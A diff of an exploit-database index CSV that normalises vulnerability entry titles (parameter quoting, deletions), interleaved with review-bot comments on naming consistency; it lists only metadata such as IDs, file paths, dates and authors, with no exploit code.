7821,platforms/php/webapps/7821.pl,"Fhimage 1.2.1 - Remote Command Execution (mq = off)",2009-01-19,Osirys,php,webapps,0 7821,platforms/php/webapps/7821.pl,"Fhimage 1.2.1 - Remote Command Execution (mq = off)",2009-01-19,Osirys,php,webapps,0
7824,platforms/php/webapps/7824.pl,"Joomla! Component com_pccookbook - (recipe_id) Blind SQL Injection",2009-01-19,InjEctOr5,php,webapps,0 7824,platforms/php/webapps/7824.pl,"Joomla! Component com_pccookbook - 'recipe_id' Parameter Blind SQL Injection",2009-01-19,InjEctOr5,php,webapps,0
7828,platforms/php/webapps/7828.txt,"Joomla! Component com_news - SQL Injection",2009-01-19,snakespc,php,webapps,0 7828,platforms/php/webapps/7828.txt,"Joomla! Component com_news - SQL Injection",2009-01-19,snakespc,php,webapps,0
7829,platforms/php/webapps/7829.txt,"Gallery Kys 1.0 - Admin Password Disclosure / Permanent Cross-Site Scripting",2009-01-19,Osirys,php,webapps,0 7829,platforms/php/webapps/7829.txt,"Gallery Kys 1.0 - Admin Password Disclosure / Permanent Cross-Site Scripting",2009-01-19,Osirys,php,webapps,0
7830,platforms/php/webapps/7830.txt,"RCBlog 1.03 - Authentication Bypass",2009-01-19,"Danny Moules",php,webapps,0 7830,platforms/php/webapps/7830.txt,"RCBlog 1.03 - Authentication Bypass",2009-01-19,"Danny Moules",php,webapps,0
@ -21178,7 +21177,7 @@ id,file,description,date,author,platform,type,port
9165,platforms/php/webapps/9165.pl,"webLeague 2.2.0 - (Authentication Bypass) SQL Injection",2009-07-16,ka0x,php,webapps,0 9165,platforms/php/webapps/9165.pl,"webLeague 2.2.0 - (Authentication Bypass) SQL Injection",2009-07-16,ka0x,php,webapps,0
9166,platforms/php/webapps/9166.txt,"ZenPhoto Gallery 1.2.5 - Admin Password Reset (CRSF)",2009-07-16,petros,php,webapps,0 9166,platforms/php/webapps/9166.txt,"ZenPhoto Gallery 1.2.5 - Admin Password Reset (CRSF)",2009-07-16,petros,php,webapps,0
9171,platforms/php/webapps/9171.txt,"VS PANEL 7.5.5 - (results.php Cat_ID) SQL Injection",2009-07-16,C0D3R-Dz,php,webapps,0 9171,platforms/php/webapps/9171.txt,"VS PANEL 7.5.5 - (results.php Cat_ID) SQL Injection",2009-07-16,C0D3R-Dz,php,webapps,0
9174,platforms/php/webapps/9174.txt,"PHP Live! 3.2.1/2 - '&x=' Blind SQL Injection",2009-07-16,boom3rang,php,webapps,0 9174,platforms/php/webapps/9174.txt,"PHP Live! 3.2.1/2 - 'x' Parameter Blind SQL Injection",2009-07-16,boom3rang,php,webapps,0
9176,platforms/php/webapps/9176.txt,"dB Masters MultiMedia's Content Manager 4.5 - SQL Injection",2009-07-16,NoGe,php,webapps,0 9176,platforms/php/webapps/9176.txt,"dB Masters MultiMedia's Content Manager 4.5 - SQL Injection",2009-07-16,NoGe,php,webapps,0
9179,platforms/php/webapps/9179.txt,"Super Simple Blog Script 2.5.4 - Local File Inclusion",2009-07-17,JIKO,php,webapps,0 9179,platforms/php/webapps/9179.txt,"Super Simple Blog Script 2.5.4 - Local File Inclusion",2009-07-17,JIKO,php,webapps,0
9180,platforms/php/webapps/9180.txt,"Super Simple Blog Script 2.5.4 - (entry) SQL Injection",2009-07-17,JIKO,php,webapps,0 9180,platforms/php/webapps/9180.txt,"Super Simple Blog Script 2.5.4 - (entry) SQL Injection",2009-07-17,JIKO,php,webapps,0
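Review bot: Context row 9166 spells the vulnerability class "CRSF" ("Admin Password Reset (CRSF)"); a title-normalisation commit touching this hunk should fix it to "CSRF" or to the spelled-out "Cross-Site Request Forgery" that rows such as 14331 use, otherwise a search for either term misses this entry. The 9174 change from "'&x='" to "'x' Parameter" looks right; 9171 and 9180 still carry the parenthesised form.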
@ -21215,7 +21214,7 @@ id,file,description,date,author,platform,type,port
9250,platforms/php/webapps/9250.sh,"WordPress 2.8.1 - (url) Cross-Site Scripting",2009-07-24,superfreakaz0rz,php,webapps,0 9250,platforms/php/webapps/9250.sh,"WordPress 2.8.1 - (url) Cross-Site Scripting",2009-07-24,superfreakaz0rz,php,webapps,0
9251,platforms/php/webapps/9251.txt,"Deonixscripts Templates Management 1.3 - SQL Injection",2009-07-24,d3b4g,php,webapps,0 9251,platforms/php/webapps/9251.txt,"Deonixscripts Templates Management 1.3 - SQL Injection",2009-07-24,d3b4g,php,webapps,0
9252,platforms/php/webapps/9252.txt,"Scripteen Free Image Hosting Script 2.3 - SQL Injection",2009-07-24,Coksnuss,php,webapps,0 9252,platforms/php/webapps/9252.txt,"Scripteen Free Image Hosting Script 2.3 - SQL Injection",2009-07-24,Coksnuss,php,webapps,0
9254,platforms/php/webapps/9254.txt,"PHP Live! 3.2.2 - (questid) SQL Injection (2)",2009-07-24,skys,php,webapps,0 9254,platforms/php/webapps/9254.txt,"PHP Live! 3.2.2 - 'questid' Parameter SQL Injection (2)",2009-07-24,skys,php,webapps,0
9255,platforms/php/webapps/9255.txt,"Clip Bucket 1.7.1 - Insecure Cookie Handling",2009-07-24,Qabandi,php,webapps,0 9255,platforms/php/webapps/9255.txt,"Clip Bucket 1.7.1 - Insecure Cookie Handling",2009-07-24,Qabandi,php,webapps,0
9256,platforms/php/webapps/9256.txt,"Scripteen Free Image Hosting Script 2.3 - Insecure Cookie Handling",2009-07-24,Qabandi,php,webapps,0 9256,platforms/php/webapps/9256.txt,"Scripteen Free Image Hosting Script 2.3 - Insecure Cookie Handling",2009-07-24,Qabandi,php,webapps,0
9257,platforms/php/webapps/9257.php,"Pixaria Gallery 2.3.5 - (file) Remote File Disclosure",2009-07-24,Qabandi,php,webapps,0 9257,platforms/php/webapps/9257.php,"Pixaria Gallery 2.3.5 - (file) Remote File Disclosure",2009-07-24,Qabandi,php,webapps,0
@ -21235,7 +21234,7 @@ id,file,description,date,author,platform,type,port
9275,platforms/php/webapps/9275.php,"Allomani Movies & Clips 2.7.0 - Blind SQL Injection",2009-07-27,Qabandi,php,webapps,0 9275,platforms/php/webapps/9275.php,"Allomani Movies & Clips 2.7.0 - Blind SQL Injection",2009-07-27,Qabandi,php,webapps,0
9276,platforms/php/webapps/9276.txt,"Joomla! Component IXXO Cart! Standalone and - SQL Injection",2009-07-27,sm0k3,php,webapps,0 9276,platforms/php/webapps/9276.txt,"Joomla! Component IXXO Cart! Standalone and - SQL Injection",2009-07-27,sm0k3,php,webapps,0
9279,platforms/php/webapps/9279.pl,"PunBB Automatic Image Upload 1.3.5 - SQL Injection",2009-07-27,Dante90,php,webapps,0 9279,platforms/php/webapps/9279.pl,"PunBB Automatic Image Upload 1.3.5 - SQL Injection",2009-07-27,Dante90,php,webapps,0
9280,platforms/php/webapps/9280.pl,"PunBB Automatic Image Upload 1.3.5 - Delete Arbitrary File Exploit",2009-07-27,Dante90,php,webapps,0 9280,platforms/php/webapps/9280.pl,"PunBB Automatic Image Upload 1.3.5 - Arbitrary File Delete",2009-07-27,Dante90,php,webapps,0
9281,platforms/php/webapps/9281.txt,"Limny 1.01 - (Authentication Bypass) SQL Injection",2009-07-27,SirGod,php,webapps,0 9281,platforms/php/webapps/9281.txt,"Limny 1.01 - (Authentication Bypass) SQL Injection",2009-07-27,SirGod,php,webapps,0
9282,platforms/php/webapps/9282.txt,"Magician Blog 1.0 - (ids) SQL Injection",2009-07-27,Evil-Cod3r,php,webapps,0 9282,platforms/php/webapps/9282.txt,"Magician Blog 1.0 - (ids) SQL Injection",2009-07-27,Evil-Cod3r,php,webapps,0
9283,platforms/php/webapps/9283.txt,"Magician Blog 1.0 - (Authentication Bypass) SQL Injection",2009-07-27,Evil-Cod3r,php,webapps,0 9283,platforms/php/webapps/9283.txt,"Magician Blog 1.0 - (Authentication Bypass) SQL Injection",2009-07-27,Evil-Cod3r,php,webapps,0
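Review bot: Context row 9276 reads "Joomla! Component IXXO Cart! Standalone and - SQL Injection", a title cut off after "Standalone and", and this cleanup leaves it as is; it should be completed from 9276.txt or trimmed to the product name. On the changed row, 9280's "Arbitrary File Delete" would read more naturally as "Arbitrary File Deletion", and 9281 and 9283 keep "(Authentication Bypass) SQL Injection" although 7004 was reordered in this same commit.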
@ -21255,7 +21254,7 @@ id,file,description,date,author,platform,type,port
9310,platforms/php/webapps/9310.txt,"dit.cms 1.3 - (path/sitemap/relPath) Local File Inclusion",2009-07-30,SirGod,php,webapps,0 9310,platforms/php/webapps/9310.txt,"dit.cms 1.3 - (path/sitemap/relPath) Local File Inclusion",2009-07-30,SirGod,php,webapps,0
9311,platforms/php/webapps/9311.txt,"cmsphp 0.21 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-30,SirGod,php,webapps,0 9311,platforms/php/webapps/9311.txt,"cmsphp 0.21 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-30,SirGod,php,webapps,0
9312,platforms/php/webapps/9312.txt,"d.net CMS - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2009-07-30,SirGod,php,webapps,0 9312,platforms/php/webapps/9312.txt,"d.net CMS - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2009-07-30,SirGod,php,webapps,0
9313,platforms/php/webapps/9313.txt,"Really Simple CMS 0.3a - (pagecontent.php PT) Local File Inclusion",2009-07-30,SirGod,php,webapps,0 9313,platforms/php/webapps/9313.txt,"Really Simple CMS 0.3a - 'PT' Parameter Local File Inclusion",2009-07-30,SirGod,php,webapps,0
9314,platforms/php/webapps/9314.txt,"MUJE CMS 1.0.4.34 - Local File Inclusion",2009-07-30,SirGod,php,webapps,0 9314,platforms/php/webapps/9314.txt,"MUJE CMS 1.0.4.34 - Local File Inclusion",2009-07-30,SirGod,php,webapps,0
9315,platforms/php/webapps/9315.pl,"PunBB Reputation.php Mod 2.0.4 - Local File Inclusion",2009-07-30,Dante90,php,webapps,0 9315,platforms/php/webapps/9315.pl,"PunBB Reputation.php Mod 2.0.4 - Local File Inclusion",2009-07-30,Dante90,php,webapps,0
9316,platforms/php/webapps/9316.txt,"linkSpheric 0.74b6 - (listID) SQL Injection",2009-07-30,NoGe,php,webapps,0 9316,platforms/php/webapps/9316.txt,"linkSpheric 0.74b6 - (listID) SQL Injection",2009-07-30,NoGe,php,webapps,0
@ -21373,7 +21372,7 @@ id,file,description,date,author,platform,type,port
9523,platforms/php/webapps/9523.txt,"Moa Gallery 1.2.0 - (index.php action) SQL Injection",2009-08-26,Mr.SQL,php,webapps,0 9523,platforms/php/webapps/9523.txt,"Moa Gallery 1.2.0 - (index.php action) SQL Injection",2009-08-26,Mr.SQL,php,webapps,0
9524,platforms/php/webapps/9524.txt,"totalcalendar 2.4 - (Blind SQL Injection / Local File Inclusion) Multiple Vulnerabilities",2009-08-26,Moudi,php,webapps,0 9524,platforms/php/webapps/9524.txt,"totalcalendar 2.4 - (Blind SQL Injection / Local File Inclusion) Multiple Vulnerabilities",2009-08-26,Moudi,php,webapps,0
9525,platforms/php/webapps/9525.txt,"Moa Gallery 1.2.0 - (p_filename) Remote File Disclosure",2009-08-26,GoLd_M,php,webapps,0 9525,platforms/php/webapps/9525.txt,"Moa Gallery 1.2.0 - (p_filename) Remote File Disclosure",2009-08-26,GoLd_M,php,webapps,0
9527,platforms/php/webapps/9527.txt,"Simple CMS Framework 1.0 - (page) SQL Injection",2009-08-26,Red-D3v1L,php,webapps,0 9527,platforms/php/webapps/9527.txt,"Simple CMS Framework 1.0 - 'page' Parameter SQL Injection",2009-08-26,Red-D3v1L,php,webapps,0
9529,platforms/php/webapps/9529.txt,"Discuz! Plugin Crazy Star 2.0 - (fmid) SQL Injection",2009-08-26,ZhaoHuAn,php,webapps,0 9529,platforms/php/webapps/9529.txt,"Discuz! Plugin Crazy Star 2.0 - (fmid) SQL Injection",2009-08-26,ZhaoHuAn,php,webapps,0
9530,platforms/php/webapps/9530.txt,"open auto Classifieds 1.5.9 - Multiple Vulnerabilities",2009-08-26,"Andrew Horton",php,webapps,0 9530,platforms/php/webapps/9530.txt,"open auto Classifieds 1.5.9 - Multiple Vulnerabilities",2009-08-26,"Andrew Horton",php,webapps,0
9531,platforms/php/webapps/9531.txt,"PAD Site Scripts 3.6 - (list.php string) SQL Injection",2009-08-26,Mr.SQL,php,webapps,0 9531,platforms/php/webapps/9531.txt,"PAD Site Scripts 3.6 - (list.php string) SQL Injection",2009-08-26,Mr.SQL,php,webapps,0
@ -21398,7 +21397,7 @@ id,file,description,date,author,platform,type,port
9572,platforms/php/webapps/9572.txt,"DataLife Engine 8.2 - dle_config_api Remote File Inclusion",2009-09-01,Kurd-Team,php,webapps,0 9572,platforms/php/webapps/9572.txt,"DataLife Engine 8.2 - dle_config_api Remote File Inclusion",2009-09-01,Kurd-Team,php,webapps,0
9576,platforms/php/webapps/9576.txt,"Discuz! Plugin JiangHu 1.1 - 'id' SQL Injection",2009-09-02,ZhaoHuAn,php,webapps,0 9576,platforms/php/webapps/9576.txt,"Discuz! Plugin JiangHu 1.1 - 'id' SQL Injection",2009-09-02,ZhaoHuAn,php,webapps,0
9577,platforms/php/webapps/9577.txt,"Ve-EDIT 0.1.4 - (highlighter) Remote File Inclusion",2009-09-02,RoMaNcYxHaCkEr,php,webapps,0 9577,platforms/php/webapps/9577.txt,"Ve-EDIT 0.1.4 - (highlighter) Remote File Inclusion",2009-09-02,RoMaNcYxHaCkEr,php,webapps,0
9578,platforms/php/webapps/9578.txt,"PHP Live! 3.3 - (deptid) SQL Injection",2009-09-02,v3n0m,php,webapps,0 9578,platforms/php/webapps/9578.txt,"PHP Live! 3.3 - 'deptid' Parameter SQL Injection",2009-09-02,v3n0m,php,webapps,0
9582,platforms/php/webapps/9582.txt,"FreeSchool 1.1.0 - Multiple Remote File Inclusion",2009-09-03,cr4wl3r,php,webapps,0 9582,platforms/php/webapps/9582.txt,"FreeSchool 1.1.0 - Multiple Remote File Inclusion",2009-09-03,cr4wl3r,php,webapps,0
9583,platforms/php/webapps/9583.txt,"PHPope 1.0.0 - Multiple Remote File Inclusion",2009-09-03,cr4wl3r,php,webapps,0 9583,platforms/php/webapps/9583.txt,"PHPope 1.0.0 - Multiple Remote File Inclusion",2009-09-03,cr4wl3r,php,webapps,0
9588,platforms/php/webapps/9588.txt,"Mambo Component com_zoom - 'catid' Blind SQL Injection",2009-09-04,boom3rang,php,webapps,0 9588,platforms/php/webapps/9588.txt,"Mambo Component com_zoom - 'catid' Blind SQL Injection",2009-09-04,boom3rang,php,webapps,0
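Review bot: Rows 9576 ("'id' SQL Injection") and 9588 ("'catid' Blind SQL Injection") already quote the parameter but lack the word "Parameter", which is exactly the form this commit rewrites for 5146 through 5163 ("'cid' SQL Injection" to "'cid' Parameter SQL Injection"). Only 9578 is updated here; convert the other two in the same pass, along with 9577's "(highlighter)", so the rule is applied uniformly.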
@ -23563,7 +23562,7 @@ id,file,description,date,author,platform,type,port
14331,platforms/php/webapps/14331.html,"TomatoCMS 2.0.5 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0 14331,platforms/php/webapps/14331.html,"TomatoCMS 2.0.5 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0
14336,platforms/php/webapps/14336.txt,"Joomla! Component 'EasyBlog' - Persistent Cross-Site Scripting",2010-07-12,Sid3^effects,php,webapps,0 14336,platforms/php/webapps/14336.txt,"Joomla! Component 'EasyBlog' - Persistent Cross-Site Scripting",2010-07-12,Sid3^effects,php,webapps,0
14337,platforms/php/webapps/14337.html,"TheHostingTool 1.2.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0 14337,platforms/php/webapps/14337.html,"TheHostingTool 1.2.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0
14338,platforms/php/webapps/14338.html,"Getsimple CMS 2.01 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0 14338,platforms/php/webapps/14338.html,"Getsimple CMS 2.01 - Multiple Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0
14342,platforms/php/webapps/14342.html,"Grafik CMS 1.1.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0 14342,platforms/php/webapps/14342.html,"Grafik CMS 1.1.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0
14355,platforms/windows/webapps/14355.txt,"dotDefender 4.02 - Authentication Bypass",2010-07-13,"David K",windows,webapps,0 14355,platforms/windows/webapps/14355.txt,"dotDefender 4.02 - Authentication Bypass",2010-07-13,"David K",windows,webapps,0
14350,platforms/php/webapps/14350.txt,"Joomla! Component 'com_qcontacts' - SQL Injection",2010-07-13,_mlk_,php,webapps,0 14350,platforms/php/webapps/14350.txt,"Joomla! Component 'com_qcontacts' - SQL Injection",2010-07-13,_mlk_,php,webapps,0
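Review bot: The new title for 14338, "Getsimple CMS 2.01 - Multiple Vulnerabilities", drops the "Cross-Site Scripting / Cross-Site Request Forgery" classes the old title carried, so a search of the CSV for either class no longer finds this row. Other rows keep a short class list in the title (17997 reads "SQL Injection / Cross-Site Scripting"); suggest "Getsimple CMS 2.01 - Cross-Site Scripting / Cross-Site Request Forgery", removing only the parentheses.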
@ -24889,7 +24888,7 @@ id,file,description,date,author,platform,type,port
17987,platforms/php/webapps/17987.txt,"WordPress Plugin BackWPUp 2.1.4 - Code Execution",2011-10-17,"Sense of Security",php,webapps,0 17987,platforms/php/webapps/17987.txt,"WordPress Plugin BackWPUp 2.1.4 - Code Execution",2011-10-17,"Sense of Security",php,webapps,0
17994,platforms/php/webapps/17994.php,"Dolphin 7.0.7 - (member_menu_queries.php) Remote PHP Code Injection",2011-10-18,EgiX,php,webapps,0 17994,platforms/php/webapps/17994.php,"Dolphin 7.0.7 - (member_menu_queries.php) Remote PHP Code Injection",2011-10-18,EgiX,php,webapps,0
17989,platforms/php/webapps/17989.txt,"Dominant Creature BBG/RPG Browser Game - Persistent Cross-Site Scripting",2011-10-17,M.Jock3R,php,webapps,0 17989,platforms/php/webapps/17989.txt,"Dominant Creature BBG/RPG Browser Game - Persistent Cross-Site Scripting",2011-10-17,M.Jock3R,php,webapps,0
17992,platforms/php/webapps/17992.txt,"GNUBoard 4.33.02 - tp.php PATH_INFO SQL Injection",2011-10-17,flyh4t,php,webapps,0 17992,platforms/php/webapps/17992.txt,"GNUBoard 4.33.02 - 'tp.php' PATH_INFO SQL Injection",2011-10-17,flyh4t,php,webapps,0
17995,platforms/php/webapps/17995.txt,"Joomla! Plugin NoNumber Framework - Multiple Vulnerabilities",2011-10-18,jdc,php,webapps,0 17995,platforms/php/webapps/17995.txt,"Joomla! Plugin NoNumber Framework - Multiple Vulnerabilities",2011-10-18,jdc,php,webapps,0
17997,platforms/php/webapps/17997.txt,"Yet Another CMS 1.0 - SQL Injection / Cross-Site Scripting",2011-10-19,"Stefan Schurtz",php,webapps,0 17997,platforms/php/webapps/17997.txt,"Yet Another CMS 1.0 - SQL Injection / Cross-Site Scripting",2011-10-19,"Stefan Schurtz",php,webapps,0
17998,platforms/php/webapps/17998.txt,"Openemr-4.1.0 - SQL Injection",2011-10-19,"I2sec-dae jin Oh",php,webapps,0 17998,platforms/php/webapps/17998.txt,"Openemr-4.1.0 - SQL Injection",2011-10-19,"I2sec-dae jin Oh",php,webapps,0
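Review bot: Style point on 17994, two rows above the changed line: it still reads "(member_menu_queries.php)" in parentheses while 17992 is converted to the quoted form 'tp.php' in the same hunk. If the quoting convention is being applied to script names, convert 17994 here as well so that adjacent rows do not mix both styles.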
@ -27194,7 +27193,6 @@ id,file,description,date,author,platform,type,port
25178,platforms/php/webapps/25178.txt,"427BB 2.x - Multiple Remote HTML Injection Vulnerabilities",2005-03-01,"Hackerlounge Research Group",php,webapps,0 25178,platforms/php/webapps/25178.txt,"427BB 2.x - Multiple Remote HTML Injection Vulnerabilities",2005-03-01,"Hackerlounge Research Group",php,webapps,0
25179,platforms/php/webapps/25179.txt,"PBLang Bulletin Board System 4.x - DelPM.php Arbitrary Personal Message Deletion",2005-03-01,Raven,php,webapps,0 25179,platforms/php/webapps/25179.txt,"PBLang Bulletin Board System 4.x - DelPM.php Arbitrary Personal Message Deletion",2005-03-01,Raven,php,webapps,0
25180,platforms/php/webapps/25180.py,"PHPNews 1.2.3/1.2.4 - auth.php Remote File Inclusion",2005-03-01,mozako,php,webapps,0 25180,platforms/php/webapps/25180.py,"PHPNews 1.2.3/1.2.4 - auth.php Remote File Inclusion",2005-03-01,mozako,php,webapps,0
25182,platforms/php/webapps/25182.txt,"auraCMS 1.5 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-02,"echo staff",php,webapps,0
25197,platforms/php/webapps/25197.txt,"PHP-Fusion 5.0 - BBCode IMG Tag Script Injection",2005-03-08,FireSt0rm,php,webapps,0 25197,platforms/php/webapps/25197.txt,"PHP-Fusion 5.0 - BBCode IMG Tag Script Injection",2005-03-08,FireSt0rm,php,webapps,0
25198,platforms/jsp/webapps/25198.txt,"OutStart Participate Enterprise 3 - Multiple Access Validation Vulnerabilities",2005-03-08,Altrus,jsp,webapps,0 25198,platforms/jsp/webapps/25198.txt,"OutStart Participate Enterprise 3 - Multiple Access Validation Vulnerabilities",2005-03-08,Altrus,jsp,webapps,0
25199,platforms/php/webapps/25199.txt,"YaBB 2.0 - Remote UsersRecentPosts Cross-Site Scripting",2005-03-08,trueend5,php,webapps,0 25199,platforms/php/webapps/25199.txt,"YaBB 2.0 - Remote UsersRecentPosts Cross-Site Scripting",2005-03-08,trueend5,php,webapps,0
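Review bot: Row 25182 ("auraCMS 1.5 - Multiple Cross-Site Scripting Vulnerabilities") is deleted with nothing in the hunk showing which entry, if any, now covers it, so anything that references that ID will stop resolving. If it was merged as a duplicate, name the surviving ID in the commit message; if it was not a duplicate, the row should stay.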
@ -27765,7 +27763,7 @@ id,file,description,date,author,platform,type,port
25954,platforms/php/webapps/25954.txt,"phpAuction 2.5 - Multiple Vulnerabilities",2005-07-07,Dcrab,php,webapps,0 25954,platforms/php/webapps/25954.txt,"phpAuction 2.5 - Multiple Vulnerabilities",2005-07-07,Dcrab,php,webapps,0
25955,platforms/php/webapps/25955.txt,"PhotoGal 1.0/1.5 - News_File Remote File Inclusion",2005-07-07,"skdaemon porra",php,webapps,0 25955,platforms/php/webapps/25955.txt,"PhotoGal 1.0/1.5 - News_File Remote File Inclusion",2005-07-07,"skdaemon porra",php,webapps,0
25956,platforms/asp/webapps/25956.txt,"Comersus Open Technologies Comersus Cart 6.0.41 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-07,"Diabolic Crab",asp,webapps,0 25956,platforms/asp/webapps/25956.txt,"Comersus Open Technologies Comersus Cart 6.0.41 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-07,"Diabolic Crab",asp,webapps,0
25957,platforms/php/webapps/25957.txt,"PunBB 1.x - profile.php User Profile Edit Module SQL Injection",2005-07-08,"Stefan Esser",php,webapps,0 25957,platforms/php/webapps/25957.txt,"PunBB 1.x - 'profile.php' User Profile Edit Module SQL Injection",2005-07-08,"Stefan Esser",php,webapps,0
25958,platforms/php/webapps/25958.txt,"ID Team ID Board 1.1.3 - SQL.CLS.php SQL Injection",2005-07-10,Defa,php,webapps,0 25958,platforms/php/webapps/25958.txt,"ID Team ID Board 1.1.3 - SQL.CLS.php SQL Injection",2005-07-10,Defa,php,webapps,0
25959,platforms/php/webapps/25959.txt,"Spid 1.3 - lang_path File Inclusion",2005-07-11,"skdaemon porra",php,webapps,0 25959,platforms/php/webapps/25959.txt,"Spid 1.3 - lang_path File Inclusion",2005-07-11,"skdaemon porra",php,webapps,0
25960,platforms/php/webapps/25960.txt,"PPA 0.5.6 - ppa_root_path File Inclusion",2005-07-10,"skdaemon porra",php,webapps,0 25960,platforms/php/webapps/25960.txt,"PPA 0.5.6 - ppa_root_path File Inclusion",2005-07-10,"skdaemon porra",php,webapps,0
@ -28052,7 +28050,7 @@ id,file,description,date,author,platform,type,port
26347,platforms/php/webapps/26347.txt,"Gallery 2.0 - main.php Directory Traversal",2005-10-14,"Michael Dipper",php,webapps,0 26347,platforms/php/webapps/26347.txt,"Gallery 2.0 - main.php Directory Traversal",2005-10-14,"Michael Dipper",php,webapps,0
26348,platforms/php/webapps/26348.txt,"Complete PHP Counter - SQL Injection",2005-10-14,BiPi_HaCk,php,webapps,0 26348,platforms/php/webapps/26348.txt,"Complete PHP Counter - SQL Injection",2005-10-14,BiPi_HaCk,php,webapps,0
26349,platforms/php/webapps/26349.txt,"Complete PHP - Counter Cross-Site Scripting",2005-10-14,BiPi_HaCk,php,webapps,0 26349,platforms/php/webapps/26349.txt,"Complete PHP - Counter Cross-Site Scripting",2005-10-14,BiPi_HaCk,php,webapps,0
26350,platforms/php/webapps/26350.txt,"PunBB 1.2.x - search.php SQL Injection",2005-10-15,Devil_box,php,webapps,0 26350,platforms/php/webapps/26350.txt,"PunBB 1.2.x - 'search.php' SQL Injection",2005-10-15,Devil_box,php,webapps,0
26351,platforms/asp/webapps/26351.txt,"Comersus Backoffice Plus - Multiple Cross-Site Scripting Vulnerabilities",2005-10-17,Lostmon,asp,webapps,0 26351,platforms/asp/webapps/26351.txt,"Comersus Backoffice Plus - Multiple Cross-Site Scripting Vulnerabilities",2005-10-17,Lostmon,asp,webapps,0
26354,platforms/jsp/webapps/26354.txt,"NetFlow Analyzer 4 - Cross-Site Scripting",2005-10-18,why@nsfocus.com,jsp,webapps,0 26354,platforms/jsp/webapps/26354.txt,"NetFlow Analyzer 4 - Cross-Site Scripting",2005-10-18,why@nsfocus.com,jsp,webapps,0
26355,platforms/php/webapps/26355.txt,"MySource 2.14 - upgrade_in_progress_backend.php target_url Parameter Cross-Site Scripting",2005-10-18,"Secunia Research",php,webapps,0 26355,platforms/php/webapps/26355.txt,"MySource 2.14 - upgrade_in_progress_backend.php target_url Parameter Cross-Site Scripting",2005-10-18,"Secunia Research",php,webapps,0
@ -28924,7 +28922,6 @@ id,file,description,date,author,platform,type,port
27449,platforms/php/webapps/27449.txt,"phpWebSite 0.8.2/0.8.3 - article.php sid Parameter SQL Injection",2006-03-20,DaBDouB-MoSiKaR,php,webapps,0 27449,platforms/php/webapps/27449.txt,"phpWebSite 0.8.2/0.8.3 - article.php sid Parameter SQL Injection",2006-03-20,DaBDouB-MoSiKaR,php,webapps,0
27450,platforms/php/webapps/27450.txt,"WinHKI 1.4/1.5/1.6 - Directory Traversal",2006-02-24,raphael.huck@free.fr,php,webapps,0 27450,platforms/php/webapps/27450.txt,"WinHKI 1.4/1.5/1.6 - Directory Traversal",2006-02-24,raphael.huck@free.fr,php,webapps,0
27451,platforms/cgi/webapps/27451.txt,"Verisign MPKI 6.0 - Haydn.exe Cross-Site Scripting",2006-03-20,"Alberto Soli",cgi,webapps,0 27451,platforms/cgi/webapps/27451.txt,"Verisign MPKI 6.0 - Haydn.exe Cross-Site Scripting",2006-03-20,"Alberto Soli",cgi,webapps,0
27453,platforms/php/webapps/27453.txt,"PHP Live! 3.0 - Status_Image.php Cross-Site Scripting",2006-03-22,kspecial,php,webapps,0
27454,platforms/php/webapps/27454.txt,"Motorola - BlueTooth Interface Dialog Spoofing",2006-03-22,kspecial,php,webapps,0 27454,platforms/php/webapps/27454.txt,"Motorola - BlueTooth Interface Dialog Spoofing",2006-03-22,kspecial,php,webapps,0
27455,platforms/cfm/webapps/27455.txt,"1WebCalendar 4.0 - viewEvent.cfm EventID Parameter SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0 27455,platforms/cfm/webapps/27455.txt,"1WebCalendar 4.0 - viewEvent.cfm EventID Parameter SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0
27456,platforms/cfm/webapps/27456.txt,"1WebCalendar 4.0 - /news/newsView.cfm NewsID Parameter SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0 27456,platforms/cfm/webapps/27456.txt,"1WebCalendar 4.0 - /news/newsView.cfm NewsID Parameter SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0
@ -29239,7 +29236,6 @@ id,file,description,date,author,platform,type,port
27854,platforms/cfm/webapps/27854.txt,"Cartweaver 2.16.11 - Details.cfm ProdID Parameter SQL Injection",2006-04-25,r0t,cfm,webapps,0 27854,platforms/cfm/webapps/27854.txt,"Cartweaver 2.16.11 - Details.cfm ProdID Parameter SQL Injection",2006-04-25,r0t,cfm,webapps,0
27858,platforms/php/webapps/27858.txt,"phpBB Chart Mod 1.1 - charts.php id Parameter Cross-Site Scripting",2006-05-11,sn4k3.23,php,webapps,0 27858,platforms/php/webapps/27858.txt,"phpBB Chart Mod 1.1 - charts.php id Parameter Cross-Site Scripting",2006-05-11,sn4k3.23,php,webapps,0
27859,platforms/php/webapps/27859.txt,"OZJournals 1.2 - 'Vname' Parameter Cross-Site Scripting",2006-05-12,Kiki,php,webapps,0 27859,platforms/php/webapps/27859.txt,"OZJournals 1.2 - 'Vname' Parameter Cross-Site Scripting",2006-05-12,Kiki,php,webapps,0
27860,platforms/php/webapps/27860.txt,"PHP Live Helper 2.0 - chat.php Cross-Site Scripting",2006-05-12,Mr-X,php,webapps,0
27863,platforms/php/webapps/27863.txt,"phpBB 2.0.20 - Unauthorized HTTP Proxy",2006-05-12,rgod,php,webapps,0 27863,platforms/php/webapps/27863.txt,"phpBB 2.0.20 - Unauthorized HTTP Proxy",2006-05-12,rgod,php,webapps,0
